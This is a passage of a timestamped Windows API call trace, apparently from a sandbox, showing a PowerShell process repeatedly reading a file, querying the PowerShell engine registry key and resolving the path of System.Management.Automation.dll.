	[0583.735] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.736] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0583.736] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.487] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.490] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.490] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.491] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.491] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.491] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.492] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.492] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.492] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.493] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.493] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.494] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.494] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.494] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.495] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.495] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.495] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.496] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.496] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.496] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.497] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.497] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.498] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.498] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.498] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.499] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.499] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.499] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.500] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.500] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0585.500] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0xf37, lpOverlapped=0x0) returned 1
	[0585.501] ReadFile (in: hFile=0x2f8, lpBuffer=0x32befef, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32befef*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0585.501] ReadFile (in: hFile=0x2f8, lpBuffer=0x32bf950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x32bf950*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0585.501] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d028 | out: phkResult=0x22d028*=0x2f8) returned 0x0
	[0585.501] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cfac, lpData=0x0, lpcbData=0x22cfa8*=0x0 | out: lpType=0x22cfac*=0x1, lpData=0x0, lpcbData=0x22cfa8*=0x56) returned 0x0
	[0585.501] CoTaskMemAlloc (cb=0x5a) returned 0x3cd4f0
	[0585.502] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cf7c, lpData=0x3cd4f0, lpcbData=0x22cf78*=0x56 | out: lpType=0x22cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22cf78*=0x56) returned 0x0
	[0585.502] CoTaskMemFree (pv=0x3cd4f0) 
	[0585.502] RegCloseKey (hKey=0x2f8) returned 0x0
	[0585.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0585.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0585.517] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xe6ae10dc, Data2=0x73cf, Data3=0x4273, Data4=([0]=0x88, [1]=0x7d, [2]=0xb7, [3]=0x98, [4]=0xea, [5]=0x17, [6]=0x8a, [7]=0x70))) returned 0x0
	[0585.517] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xa5a59859, Data2=0x4c4e, Data3=0x4bd2, Data4=([0]=0x81, [1]=0xff, [2]=0x40, [3]=0x74, [4]=0xfe, [5]=0xa6, [6]=0x73, [7]=0x6f))) returned 0x0
	[0587.211] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x344d5c81, Data2=0x65cf, Data3=0x4209, Data4=([0]=0xbd, [1]=0x2f, [2]=0x68, [3]=0x36, [4]=0xf4, [5]=0x10, [6]=0x15, [7]=0xbc))) returned 0x0
	[0587.212] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x91166408, Data2=0x34d5, Data3=0x41d8, Data4=([0]=0xb0, [1]=0x92, [2]=0x8f, [3]=0x22, [4]=0xb1, [5]=0xfb, [6]=0x37, [7]=0xea))) returned 0x0
	[0587.215] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x5fa57b, Data2=0xc7e6, Data3=0x4473, Data4=([0]=0x8f, [1]=0x4d, [2]=0xda, [3]=0xb1, [4]=0xfa, [5]=0xe6, [6]=0x2c, [7]=0x21))) returned 0x0
	[0587.215] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x11f9fd2b, Data2=0x3ece, Data3=0x4207, Data4=([0]=0xa8, [1]=0x77, [2]=0x1d, [3]=0x2e, [4]=0x43, [5]=0x8d, [6]=0x2d, [7]=0x72))) returned 0x0
	[0588.731] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x13e277d9, Data2=0x8949, Data3=0x403d, Data4=([0]=0xaf, [1]=0x7f, [2]=0xc8, [3]=0x55, [4]=0xeb, [5]=0x83, [6]=0x50, [7]=0xf))) returned 0x0
	[0588.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.736] VirtualQuery (in: lpAddress=0x22b260, lpBuffer=0x22c120, dwLength=0x30 | out: lpBuffer=0x22c120*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0588.737] VirtualQuery (in: lpAddress=0x22b2f0, lpBuffer=0x22c1b0, dwLength=0x30 | out: lpBuffer=0x22c1b0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0588.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.740] VirtualQuery (in: lpAddress=0x22b510, lpBuffer=0x22c3d0, dwLength=0x30 | out: lpBuffer=0x22c3d0*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0588.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
